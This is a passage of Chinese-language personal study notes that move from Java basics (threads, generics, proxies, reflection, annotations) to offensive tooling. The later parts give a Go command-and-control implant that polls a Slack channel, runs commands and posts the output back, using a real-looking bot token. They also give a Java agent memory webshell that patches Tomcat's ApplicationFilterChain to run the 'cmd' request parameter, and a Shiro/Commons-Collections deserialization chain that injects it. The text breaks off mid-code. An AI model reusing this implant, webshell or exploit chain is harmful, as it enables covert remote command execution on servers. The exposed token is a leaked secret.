class Consumer extends Thread{
    SynContainer container;

    public Consumer(SynContainer container){
        this.container = container;
    }

    //消费


    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println("消费了第"+container.pop().id+"只鸡");
        }
    }
}

//产品

class Chicken{
    int id; //产品编号

    public Chicken(int id) {
        this.id = id;
    }
}

//缓冲区

class SynContainer{

    //需要一个容器大小

    Chicken[] chickens = new Chicken[10];

    //容器计数器

    int count = 0;
    //生产者放入产品

    public synchronized void push(Chicken chicken){

        //如果容器满了，就需要等待消费者消费
        if(count==chickens.length){
            //通知消费者消费，生产等待

            try{
                this.wait();
            }catch (InterruptedException e ){
                e.printStackTrace();
            }
        }
        //荣国没有满，就需要丢入产品
        chickens[count]=chicken;
        count++;

        //可以通知消费者消费了

        this.notifyAll();
    }

    //消费者消费产品

    public synchronized Chicken pop(){
        //判断能否消费

        if(count==0){
            //等待生产者生产，消费者等待
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }

        }

        //如果可以消费
        count--;
        Chicken chicken = chickens[count];

        //吃完了，通知生产者生产
        this.notifyAll();
        return chicken;
    }

}

信号灯法(设置标志位)

public class TestPc2 {

    public static void main(String[] args) {

        TV tv = new TV();

        new Player(tv).start();
        new Watcher(tv).start();
    }
}


//生产者-〉演员

class Player extends Thread{
    TV tv;
    public Player(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i < 20; i++) {
            if(i%2==0){
                this.tv.play("快乐大本营");
            }else {
                this.tv.play("抖音，记录美好生活");

            }        }
    }
}

//消费者-〉观看

class Watcher extends Thread{
    TV tv;
    public Watcher(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i < 20; i++) {
            tv.watch();
        }
    }
}

//产品->节目

class TV{
    //演员表演，观众等待
    //观众观看，演员等待

    String voice;
    boolean flag = true;

    //表演

    public synchronized void play(String voice){

        if(!flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();

            }
        }        System.out.println("演员表演了:"+voice);

        this.notifyAll();
        this.voice = voice;
        this.flag = !this.flag;
    }

    //观看


    public synchronized void watch(){

        if(flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }
        }

        System.out.println("观看了"+voice);

        //通知演员表演

        this.notifyAll();
        this.flag = !this.flag;

    }
}

线程池

import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

/**
 * 测试线程池
 * **/
public class TestPool {
    public static void main(String[] args) {
        ExecutorService service = Executors.newFixedThreadPool(10);

        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());

    }

}


class MyThread implements Runnable{

    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println(Thread.currentThread().getName()+i);
        }
    }
}

• 泛型，参数化类型，分为泛型类、接口、方法

泛型类

class 类名称 <泛型标识> {
    private 泛型标识 var;
    ...
}

泛型接口

public class chabug {
    public static void main(String[] args) {
        new testa().next();
    }

}

interface test<T>{
    public T next();
}

class testa implements test<String>{
    private String[] b  = new String[]{"a","b","c","d"};
    @Override
    public String next(){
        Random rand = new Random();
        System.out.println(b[rand.nextInt(3)]);
        return null;
    }
}

泛型方法

public class chabug {
    public static void main(String[] args) {
        out("28");
        out("永远滴神");
    }

    public static <T> void out(T t) {
        System.out.println(t);
    }
}

泛型通配符

public void showKeyValue1(Generic<?> obj){
    Log.d("泛型测试","key value is " + obj.getKey());
}

泛型上下边界

• 在使用泛型的时候，我们还可以为传入的泛型类型实参进行上下边界的限制，如：类型实参只准传入某种类型的父类或某种类型的子类。为泛型添加上边界，即传入的类型实参必须是指定类型的子类型,泛型的上下边界添加，必须与泛型的声明在一起.

• 常规例子（会提示类型无法转换）

• 使用上下边界

• 疑惑

GenericHolder<Fruit> fruitHolder = new GenericHolder<Fruit>()

为何意思

解决：

Fruit fruit = new Fruit("水果");
fruitHolder.setObj(fruit)

先实例化再传入对象，参考如下：

Java泛型再探——泛型通配符及上下边界

泛型数组

• 不可以

List<String>[] ls = new ArrayList<String>[10];  

• 可以

List<?>[] ls = new ArrayList<?>[10]; 
List<String>[] ls = new ArrayList[10];

代理

静态代理

抽象角色：一般会使用接口或抽象类来解决
真实角色：被代理的角色
代理角色：代理真实角色后，我们一般会做一些附属操作
客户：访问代理对象的人

• 抽象角色

//接口——》租房
public interface Rent {

    public void rent();
}

• 真实角色

//真实角色->房东
public class Host implements Rent{
    @Override
    public void rent(){
        System.out.println("房东要出租房子");
    }
}

• 代理角色

package ChaBugStudy;

public class Proxy implements Rent{

      private Host host;

      public Proxy(){

      }
      public Proxy(Host host){
          this.host = host;
      }

      public void rent(){
            seeHouse();
            host.rent();
            hetong();
            fare();
      }

      //看房

      public void seeHouse(){
            System.out.println("中介带你看房");
      }

      public void hetong(){
            System.out.println("签合同吧！");
      }
      //收中介费

      public void fare(){
            System.out.println("这房子不错，阔绰的你决定给点小费");
      }

}

• 客户端访问代理角色

public class Clinet {

    public static void main(String[] args) {
        Host host = new Host();
        Proxy proxy = new Proxy(host);

        proxy.rent();
    }
}

• 运行一下看看效果

• 缺点

一个真实对象需要产生一个代理

动态代理（先留着看完反射再看）

• 动态代理（这里是基于JDK动态代理）

一个动态代理类可以代理多个类，只要是实现了同一个接口

• 抽象角色

public interface Rent {

   public void rent();
}

• 真实角色

public class Host implements Rent{

    public void rent(){
        System.out.println("房东要出租房子！");
    }
}

• 代理角色

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

public class Proxyhandler implements InvocationHandler {

    //被代理的接口

    Rent rent;
    public void setRent(Rent rent){
        this.rent = rent;
    }

    //生成得到代理类

    public Object getProxy(){
        return Proxy.newProxyInstance(this.getClass().getClassLoader(),rent.getClass().getInterfaces(),this);
    }

    // 处理代理实例，并返回结果

    public Object invoke(Object proxy, Method method,Object[] args) throws Throwable{
        Object result = method.invoke(rent,args);
        return result;
    }
}

• 客户端（客户）角色

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class Clent {

    public static void main(String[] args) {
        //真实角色
        Host host = new Host();
        //代理角色

        Proxyhandler pih = new Proxyhandler();
        //通过调用程序处理角色来处理要调用的接口角色

        pih.setRent(host);

        Rent proxy = (Rent) pih.getProxy();

        proxy.rent();
    }
}

注解（Java.Annotation）

• 格式

@注释名

• 内置注解

@Override

定义在java.lang.Override中，表示重写

Deprecated 

定义在java.lang.Deprecated中，表示废弃，不鼓励使用，使用时会多一条横线，但依旧可以使用

@SuppressWarnings 

定义在java.lang.SuppressWarnings中，用来抑制编译时的警告信息

使用前

使用后

元注解

• 作用

注解其他注解

• @Target(用于描述注解的使用范围)

@MYAnnotation
public class ZhuJie {

    @MYAnnotation
    public static void main(String[] args) {

    }


}

//METHOD 方法、TYPE 类
@Target(value = {ElementType.METHOD,ElementType.TYPE})
@interface MYAnnotation{

}

• @Retention(表示需要在什么级别保存该注释信息，用来描述注解的生命周期（SOURCE < CLASS < RUNTime）)

@Retention(value = RetentionPolicy.RUNTIME)

• @Document(说明该注释将被包含在javadoc中)
• @Inherited(说明该子类可以继承父类中的该注解)

自定义注解

• @interface(自定义注解关键字)

• 格式

public @interface 注解名{定义内容}

• 自定义注解

package ChaBugStudy;


import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

@Syst1m(Team = "ChaBUg",Founder = "Y4er",brother = "syle")
public class ZhuJie {
    @Syst1m
    public static void main(String[] args) {
        System.out.println("ChaBug.Org");
    }


}


@Target(value = {ElementType.TYPE,ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@interface Syst1m{

    String Team() default "ChaBug";
    String Founder() default "Y4er";
    String brother() default "Syle";

}

反射（Reflection）

• 正常方式

引入需要的“包类”名称-）通过new实例化-〉取得实例化对象

• 反射方式

实例化对象->getclass()方法->取得完整的“包类”名称

• 优缺点

可以实现动态创建对象和编译，体现出很大的灵活性。

对性能有影响，慢于直接操作

• 主要API

java.lang.class  代表一个类
java.lang.reflect.Method  代表类的方法
java.lang.reflect.Field 代表类的成员变量
java.lang.reflect.Constructor 代表类的构造器

• 获取class类的几种方式

常用方法

package ChaBugStudy;

public class Reflection {
    public static void main(String[] args) throws ClassNotFoundException {
        Person person = new Student();

        //方式一：通过对象获得
        Class c1 = person.getClass();
        System.out.println(c1.hashCode());

        //方式二：forname获得

        Class c2 = Class.forName("ChaBugStudy.Person");
        System.out.println(c2.hashCode());

        //方式三 通过类名.class

        Class c3 = Person.class;
        System.out.println(c3.hashCode());

        //方式四 内置类型的包装类

        Class c4 = Integer.TYPE;
        System.out.println(c4.hashCode());

        //获取父类

        Class c5 = c1.getSuperclass();
        System.out.println(c5.hashCode());

    }
}

class Person{
    String name;

    public Person(){

    }

    public Person(String name){

    }

    @Override
    public String toString(){
        return name;
    }
}

class Student extends Person{
    public Student(){
        this.name = "学生";
        }
}


class Teacher extends Person{
    public Teacher(){
        this.name = "老师";
        }
}

• 哪些类型可以有Class对象

**
class
interface接口
[]数组
enum枚举
注解@interface
基本数据类型
void
**

    Class c1 = Object c1 = Object.class; //类
    Class c2 = Comparable.class; //接口
    Class c3 = String[].class; //数组
    Class c4 = Override.class; //注解
    Class c5= ElementType.class; // 枚举
    Class c6 = Integer.class; // 基本数据
    Class c7 = void.class; //void
    Class c8 = Class.class; //CLass

• 获取运行时类的完整结构

获取类的名字

c1.getName() 获取包名加类名
c1.getSimpleName() 获得类名

获得类的属性

Field[] field = c1.getFields() 只能获取public属性
fields = c1.getDeclaredFields() 找到全部的属性

获得指定属性的值

Field name = c1.getDeclaredField("name")

获得类的方法

Method[] methods = c1.getMethods(); 获得本类以及父类的全部public方法

methods = c1.getDeclaredMethods(); 获得本类的所有方法

获得指定方法

Method getname = c1.getMethod("getname",null)
Method serName = c1.getMethod("setname",String.class)

获得构造器

Constructor[] constructors = c1.getConstructors();
for (Constructor constructor:constructors){
    System.out.println(construcior)}

constructors = c1.getDeclaredConstructors();

获得指定构造器

c1.getDeclaredConstructor(String.class,int.class)

• 动态创建对象执行方法

获得对象

Class c1 = Class.forname("XXX")

构造对象

User user = (User) c1.nerInstance(); 无参构造器

通过构造器创建对象

Constructor constructor = c1.getDeclaredConstructor(String.class)
User user2 = (USer)constructor.nerInstance("Syst1m")

反射调用普通方法

User user3 = (User)c1.nerInstance();
Method serName = c1.getDeclaredMethod("setName",Strind.class);
setName.invoke(User3,"syst1m");

反射操作属性

不能直接操作私有属性，需要关闭安全检测

User user4 = (User)c1.nerInstance();
Field name = c1.getDeclaredFields();

name.setAccessible(true) //关闭权限检测
name.set(User4,"syst1m");

• 参考

https://blog.csdn.net/lililuni/article/details/83449088

配置slack

注册账号什么的就不说了。访问 https://api.slack.com/ 点击 Start Building

创建一个app

左侧OAuth & Permissions -> Scopes 配置token权限，暂时先配置两个，之后用哪个再加。

然后往上翻点Install App to Workspace

点allow，然后会自动跳转到token界面，记住这个token。

xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S

创建一个channel

记住你的channel链接https://app.slack.com/client/T01C58MD8L9/C01BS6GEUJH中的C01BS6GEUJH

通过 /invite @myslackbot把bot加到频道里。

然后在https://api.slack.com/methods是操作bot的所有api，先用https://api.slack.com/methods/conversations.history/test测试下获取聊天记录

配置好token和channel ID

点test之后获取到聊天记录

简单的流程知道了，接下来通过golang来操作api，以及编写我们的C2。

golang编写

package main

import (
    "fmt"
    "github.com/tidwall/gjson"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
    "strings"
    "time"
)

const (
    History_api = "https://slack.com/api/conversations.history"
    PostMessage = "https://slack.com/api/chat.postMessage"
    Token       = "xoxb-1413293450689-1403506559507-aWLcahb6cGLZWGHF61QPV17S"
    Channel     = "C01BS6GEUJH"
)

func main() {
    for true {
        time.Sleep(time.Second * 10)
        result := getHistory()
        if strings.HasPrefix(result.Str, "shell") {
            cmdRes := ExecCommand(strings.Split(result.Str, " ")[1])
            putRes(cmdRes)
        } else if strings.HasPrefix(result.Str, "exit") {
            os.Exit(0)
        } else {
            fmt.Println("no command")
        }
    }
}

func getHistory() (result gjson.Result) {
    req, err := http.NewRequest("GET", History_api, nil)
    if err != nil {
        return gjson.Result{}
    }
    q := req.URL.Query()
    q.Add("token", Token)
    q.Add("channel", Channel)
    q.Add("pretty", "1")
    q.Add("limit", "1")
    req.URL.RawQuery = q.Encode()

    resp, err := http.DefaultClient.Do(req)
    if err != nil {
        return gjson.Result{}
    }
    defer resp.Body.Close()
    byte, _ := ioutil.ReadAll(resp.Body)
    result = gjson.GetBytes(byte, "messages.0.text")
    return
}

func putRes(res string) {
    req, err := http.NewRequest("POST", PostMessage, nil)
    if err != nil {
        return
    }
    p := req.URL.Query()
    p.Add("token", Token)
    p.Add("channel", Channel)
    p.Add("pretty", "1")
    p.Add("text", res)
    req.URL.RawQuery = p.Encode()
    resp, err := http.DefaultClient.Do(req)
    defer resp.Body.Close()
    if err != nil {
        return
    }

}

func ExecCommand(command string) (out string) {
    cmd := exec.Command(command)
    o, err := cmd.CombinedOutput()

    if err != nil {
        out = fmt.Sprintf("shell run error: n%sn", err)
    } else {
        out = fmt.Sprintf("combined out:n%sn", string(o))
    }
    return
}

看下效果

https://www.bilibili.com/video/BV1uk4y1C7oP/

自己偷偷摸摸实现了很多功能，就不放了，通过slack的API可以做很多事情。

Java内存shell有很多种，大致分为：

1. 动态注册servlet
2. 动态注册filter
3. 动态注册listener
4. 基于Java agent拦截修改关键类字节码实现内存shell

前三种方法在 《JSP Webshell那些事 — 攻击篇(下)》 一文中均有讲解，但是前三种方法均需要对中间件大量调试，反射调用一步一步的链条，对于大型中间件比如weblogic这种比较麻烦，无法实现一套代码通用。

那么本文将要讲解的最后一种方法，通过拦截修改关键类的字节码，只需要寻找到关键类做处理即可，进而最大程度实现一套代码通用（理论上）。

简单认识Java Agent

在jdk的rt.jar包中存在一个java.lang.instrument包，该包提供了一些工具帮助开发人员在 Java 程序运行时，动态修改系统中的 Class 类型。其中，使用该软件包的一个关键组件就是 Javaagent。从名字上看，似乎是个 Java 代理之类的，而实际上，他的功能更像是一个Class 类型的转换器，他可以在运行时接受重新外部请求，对Class类型进行修改。

Javaagent是java命令的一个参数。参数 javaagent 可以用于指定一个 jar 包，并且对该 java 包有2个要求：
1. 这个 jar 包的 MANIFEST.MF 文件必须指定 Premain-Class 项。
2. Premain-Class 指定的那个类必须实现 premain() 方法。

JVM启动时会优先加载agent里面的东西，我们写一个简单的agent来看一下。

项目结构

└───src
    └───org
        └───chabug
                Agent.java
                DefineTransformer.java

org.chabug.Agent.java

package org.chabug;

import java.lang.instrument.Instrumentation;

public class Agent {
    public static void premain(String agentArgs, Instrumentation inst) {
        System.out.println("agentArgs : " + agentArgs);
        inst.addTransformer(new DefineTransformer(), true);
    }
}

org.chabug.DefineTransformer.java

package org.chabug;

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.security.ProtectionDomain;

public class DefineTransformer implements ClassFileTransformer {
    @Override
    public byte[] transform(ClassLoader loader, String className, Class<?> classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
        System.out.println("premain load Class:" + className);
        return new byte[0];
    }
}

然后配置打包文件srcMETA-INFMANIFEST.MF

Manifest-Version: 1.0
Can-Redefine-Classes: true
Can-Retransform-Classes: true
Premain-Class: org.chabug.Agent

idea打包为jar文件之后，创建一个新的类org.chabug.Main测试agent

package org.chabug;

public class Main {
    public static void main(String[] args) {
        System.out.println("thisismain");
    }
}

idea设置运行时vm参数-javaagent:outartifactsTestAgent_jarTestAgent.jar

运行结果

agentArgs : null
premain load Class:java/util/concurrent/ConcurrentHashMap$ForwardingNode
premain load Class:sun/misc/URLClassPath$JarLoader$2
premain load Class:java/util/jar/Attributes
premain load Class:java/util/jar/Manifest$FastInputStream
premain load Class:java/lang/StringCoding
premain load Class:java/lang/StringCoding$StringDecoder
premain load Class:java/util/jar/Attributes$Name
premain load Class:sun/misc/ASCIICaseInsensitiveComparator
premain load Class:com/intellij/rt/execution/application/AppMainV2$Agent
premain load Class:com/intellij/rt/execution/application/AppMainV2
premain load Class:com/intellij/rt/execution/application/AppMainV2$1
premain load Class:java/lang/reflect/InvocationTargetException
premain load Class:java/lang/NoSuchMethodException
premain load Class:java/net/Socket
premain load Class:java/net/InetSocketAddress
premain load Class:java/net/SocketAddress
premain load Class:java/net/InetAddress
premain load Class:java/net/InetSocketAddress$InetSocketAddressHolder
premain load Class:sun/security/action/GetBooleanAction
premain load Class:java/lang/invoke/MethodHandleImpl
premain load Class:java/net/InetAddress$1
premain load Class:java/lang/invoke/MethodHandleImpl$1
premain load Class:java/lang/invoke/MethodHandleImpl$2
premain load Class:java/util/function/Function
premain load Class:java/net/InetAddress$InetAddressHolder
premain load Class:java/net/InetAddress$Cache
premain load Class:java/net/InetAddress$Cache$Type
premain load Class:java/net/InetAddressImplFactory
premain load Class:java/lang/invoke/MethodHandleImpl$3
premain load Class:java/lang/invoke/MethodHandleImpl$4
premain load Class:java/lang/ClassValue
premain load Class:java/net/Inet6AddressImpl
premain load Class:java/lang/ClassValue$Entry
premain load Class:java/net/InetAddressImpl
premain load Class:java/lang/ClassValue$Identity
premain load Class:java/lang/ClassValue$Version
premain load Class:java/lang/invoke/MemberName$Factory
premain load Class:java/net/InetAddress$2
premain load Class:java/lang/invoke/MethodHandleStatics
premain load Class:sun/net/spi/nameservice/NameService
premain load Class:java/lang/invoke/MethodHandleStatics$1
premain load Class:java/net/Inet4Address
premain load Class:java/net/SocksSocketImpl
premain load Class:java/net/SocksConsts
premain load Class:sun/misc/PostVMInitHook
premain load Class:java/net/PlainSocketImpl
premain load Class:sun/misc/PostVMInitHook$2
premain load Class:java/net/AbstractPlainSocketImpl
premain load Class:jdk/internal/util/EnvUtils
premain load Class:sun/misc/PostVMInitHook$1
premain load Class:java/net/SocketImpl
premain load Class:java/net/SocketOptions
premain load Class:sun/usagetracker/UsageTrackerClient
premain load Class:java/net/AbstractPlainSocketImpl$1
premain load Class:java/util/concurrent/atomic/AtomicBoolean
premain load Class:sun/usagetracker/UsageTrackerClient$1
premain load Class:java/net/PlainSocketImpl$1
premain load Class:sun/usagetracker/UsageTrackerClient$4
premain load Class:sun/misc/FloatingDecimal
premain load Class:sun/usagetracker/UsageTrackerClient$2
premain load Class:sun/misc/FloatingDecimal$ExceptionalBinaryToASCIIBuffer
premain load Class:sun/misc/FloatingDecimal$BinaryToASCIIConverter
premain load Class:sun/usagetracker/UsageTrackerClient$3
premain load Class:sun/misc/FloatingDecimal$BinaryToASCIIBuffer
premain load Class:sun/misc/FloatingDecimal$1
premain load Class:sun/misc/FloatingDecimal$PreparedASCIIToBinaryBuffer
premain load Class:sun/misc/FloatingDecimal$ASCIIToBinaryConverter
premain load Class:sun/misc/FloatingDecimal$ASCIIToBinaryBuffer
premain load Class:java/net/DualStackPlainSocketImpl
premain load Class:java/lang/StringCoding$StringEncoder
premain load Class:java/net/Inet6Address
premain load Class:java/io/FileOutputStream$1
premain load Class:java/net/Inet6Address$Inet6AddressHolder
premain load Class:sun/launcher/LauncherHelper
premain load Class:java/net/SocksSocketImpl$3
premain load Class:sun/nio/cs/MS1252
premain load Class:java/net/ProxySelector
premain load Class:sun/nio/cs/SingleByte
premain load Class:sun/net/spi/DefaultProxySelector
premain load Class:sun/nio/cs/SingleByte$Decoder
premain load Class:sun/net/spi/DefaultProxySelector$1
premain load Class:sun/net/NetProperties
premain load Class:sun/net/NetProperties$1
premain load Class:org/chabug/Main
premain load Class:sun/launcher/LauncherHelper$FXHelper
premain load Class:java/util/Properties$LineReader
premain load Class:java/lang/Class$MethodArray
premain load Class:java/lang/Void
thisismain
premain load Class:java/lang/Shutdown
premain load Class:java/net/URI
premain load Class:java/lang/Shutdown$Lock

可以看到agent的org.chabug.Agent#premain优于Main方法而先被运行，并且在org.chabug.DefineTransformer#transform获取到了JVM加载的类。

那么思路回到内存shell的思路中，如果我们把这个agent加载到jvm中，那么就可以通过javassist进行字节码插桩，修改tomcat的filter实现类，从而实现内存马。

现在的问题就在于：

1. javassist 应该修改哪个关键类？
2. 如何指定运行时tomcat的-javaagent参数？
3. 如何修改tomcat运行后已经加载的类？
4. 如何通过反序列化注入

寻找关键类

tomcat filter内存shell有无数的分析文章，其中大部分都提到了一个关键类org.apache.catalina.core.ApplicationFilterChain#doFilter

该方法有ServletRequest和ServletResponse两个参数，里面封装了请求的request和response。另外，internalDoFilter方法是自定义filter的入口，如果在这里拦截，那么filter既通用，又不影响正常业务。

来写agent

package org.chabug;

import java.lang.instrument.Instrumentation;

public class MyAgent {
    // tomcat FilterChain
    public static String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String args, Instrumentation inst) throws Exception {
        inst.addTransformer(new MyTransformer(), true);
        Class[] loadedClasses = inst.getAllLoadedClasses();

        for (int i = 0; i < loadedClasses.length; ++i) {
            Class clazz = loadedClasses[i];
            if (clazz.getName().equals(ClassName)) {
                try {
                    inst.retransformClasses(new Class[]{clazz});
                } catch (Exception var9) {
                    var9.printStackTrace();
                }
            }
        }
//        System.out.println("agent done");
    }

    public static void premain(String args, Instrumentation inst) throws Exception {

    }
}

定义transform

package org.chabug;

import javassist.*;

import java.io.IOException;
import java.lang.instrument.ClassFileTransformer;
import java.security.ProtectionDomain;

public class MyTransformer implements ClassFileTransformer {
    public static String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    @Override
    public byte[] transform(ClassLoader loader, String className, Class<?> aClass, ProtectionDomain protectionDomain, byte[] classfileBuffer) {
        className = className.replace('/', '.');

        if (className.equals(ClassName)) {
//            System.out.println(":::::::::::::::::::find shiro ApplicationFilterChain:" + className);
            ClassPool cp = ClassPool.getDefault();
            if (aClass != null) {
                ClassClassPath classPath = new ClassClassPath(aClass);
                cp.insertClassPath(classPath);
            }
            CtClass cc;
            try {
                cc = cp.get(className);
                CtMethod m = cc.getDeclaredMethod("doFilter");
                m.insertBefore(" javax.servlet.ServletRequest req = request;n" +
                        "            javax.servlet.ServletResponse res = response;" +
                        "String cmd = req.getParameter("cmd");n" +
                        "if (cmd != null) {n" +
                        "Process process = Runtime.getRuntime().exec(cmd);n" +
                        "java.io.BufferedReader bufferedReader = new java.io.BufferedReader(n" +
                        "new java.io.InputStreamReader(process.getInputStream()));n" +
                        "StringBuilder stringBuilder = new StringBuilder();n" +
                        "String line;n" +
                        "while ((line = bufferedReader.readLine()) != null) {n" +
                        "stringBuilder.append(line + '\n');n" +
                        "}n" +
                        "res.getOutputStream().write(stringBuilder.toString().getBytes());n" +
                        "res.getOutputStream().flush();n" +
                        "res.getOutputStream().close();n" +
                        "}");
                byte[] byteCode = cc.toBytecode();
                cc.detach();
                return byteCode;
            } catch (NotFoundException | IOException | CannotCompileException e) {
                e.printStackTrace();
//                System.out.println("error:::::::::::::::::::::" + e.getMessage());
            }
        }

        return new byte[0];
    }
}

如何指定-javaagent参数

tomcat运行前我们无法控制命令行参数，但是运行时JVM提供了com.sun.tools.attach.VirtualMachine的api，可以通过这个类attach jvm，然后通过loadAgent()函数把agent加载进去。

然后在这里又碰到了坑，com.sun.tools.attach.VirtualMachine这个类是JDK的C:Program FilesJavajdk1.8.0_251libtools.jar包中，在tomcat运行时是jre环境，获取不到这个类。我的办法是通过URLClassLoader加载java.home拼接出来的jar包路径，然后反射获取类和方法。

实现代码

package org.chabug;

public class Main {
    public static void main(String[] args) throws Exception {
        if (args.length == 0) {
            return;
        }
        String agentPath = args[0];
        try {
            java.io.File toolsJar = new java.io.File(System.getProperty("java.home").replaceFirst("jre", "lib") + java.io.File.separator + "tools.jar");
            java.net.URLClassLoader classLoader = (java.net.URLClassLoader) java.lang.ClassLoader.getSystemClassLoader();
            java.lang.reflect.Method add = java.net.URLClassLoader.class.getDeclaredMethod("addURL", new java.lang.Class[]{java.net.URL.class});
            add.setAccessible(true);
            add.invoke(classLoader, new Object[]{toolsJar.toURI().toURL()});
            Class<?> MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");
            Class<?> MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");
            java.lang.reflect.Method list = MyVirtualMachine.getDeclaredMethod("list", new java.lang.Class[]{});
            java.util.List<Object> invoke = (java.util.List<Object>) list.invoke(null, new Object[]{});
//            System.out.println(invoke);

            for (int i = 0; i < invoke.size(); i++) {
                Object o = invoke.get(i);
                java.lang.reflect.Method displayName = o.getClass().getSuperclass().getDeclaredMethod("displayName", new Class[]{});
                Object name = displayName.invoke(o, new Object[]{});
                System.out.println(String.format("find jvm process name:[[[" +
                        "%s" +
                        "]]]", name.toString()));
                if (name.toString().contains("org.apache.catalina.startup.Bootstrap")) {
                    java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach", new Class[]{MyVirtualMachineDescriptor});
                    Object machine = attach.invoke(MyVirtualMachine, new Object[]{o});
                    java.lang.reflect.Method loadAgent = machine.getClass().getSuperclass().getSuperclass().getDeclaredMethod("loadAgent", new Class[]{String.class});
                    loadAgent.invoke(machine, new Object[]{agentPath});
                    java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach", new Class[]{});
                    detach.invoke(machine, new Object[]{});
                    System.out.println("inject tomcat done, break.");
                    System.out.println("check url http://localhost:8080/?cmd=whoami");
                    break;
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

运行这个类，传入agentPath就可以注入agent了。

在这里还碰到一个坑:VirtualMachine.list()获取为空，后来发现双击tomcat的startup.bat启动，在jconsole中也找不到jvm进程，然后一顿乱试发现通过命令行运行startup.bat就可以了。

如何修改tomcat运行后已经加载的类

其实这个问题在上面写agent的时候已经解决了，关键代码

Class[] loadedClasses = inst.getAllLoadedClasses();

for (int i = 0; i < loadedClasses.length; ++i) {
    Class clazz = loadedClasses[i];
    if (clazz.getName().equals(ClassName)) {
        try {
            inst.retransformClasses(new Class[]{clazz});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

通过Instrumentation的getAllLoadedClasses()就能拿到tomcat运行后已经加载的类，再通过retransformClasses()重新转换下就可以了。

如何通过反序列化注入

我这里是shiro550 tomcat9的环境，根据 https://github.com/feihong-cs/ShiroExploit 的ysoserial工具抠出来CC10的链条，改了改。

package org.chabug.demo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.util.Reflections;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.io.*;
import java.lang.reflect.Field;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

// 依赖 commons-collections:commons-collections:3.2.1
// 依赖于 ysoserial javassist
public class CC10 {

    static {
        System.setProperty("jdk.xml.enableTemplatesImplDeserialization", "true");
        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
    }

    public static Object createTemplatesImpl(String command) throws Exception {
        return Boolean.parseBoolean(System.getProperty("properXalan", "false")) ? createTemplatesImpl(command, Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")) : createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
    }

    public static <T> T createTemplatesImpl(String agentPath, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory) throws Exception {
        T templates = tplClass.newInstance();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        CtClass clazz = pool.get(StubTransletPayload.class.getName());
        String cmd = String.format(
                "        try {n" +
                        "java.io.File toolsJar = new java.io.File(System.getProperty("java.home").replaceFirst("jre", "lib") + java.io.File.separator + "tools.jar");n" +
                        "java.net.URLClassLoader classLoader = (java.net.URLClassLoader) java.lang.ClassLoader.getSystemClassLoader();n" +
                        "java.lang.reflect.Method add = java.net.URLClassLoader.class.getDeclaredMethod("addURL", new java.lang.Class[]{java.net.URL.class});n" +
                        "add.setAccessible(true);n" +
                        "            add.invoke(classLoader, new Object[]{toolsJar.toURI().toURL()});n" +
                        "Class/*<?>*/ MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");n" +
                        "            Class/*<?>*/ MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");" +
                        "java.lang.reflect.Method list = MyVirtualMachine.getDeclaredMethod("list", null);n" +
                        "            java.util.List/*<Object>*/ invoke = (java.util.List/*<Object>*/) list.invoke(null, null);" +
                        "for (int i = 0; i < invoke.size(); i++) {" +
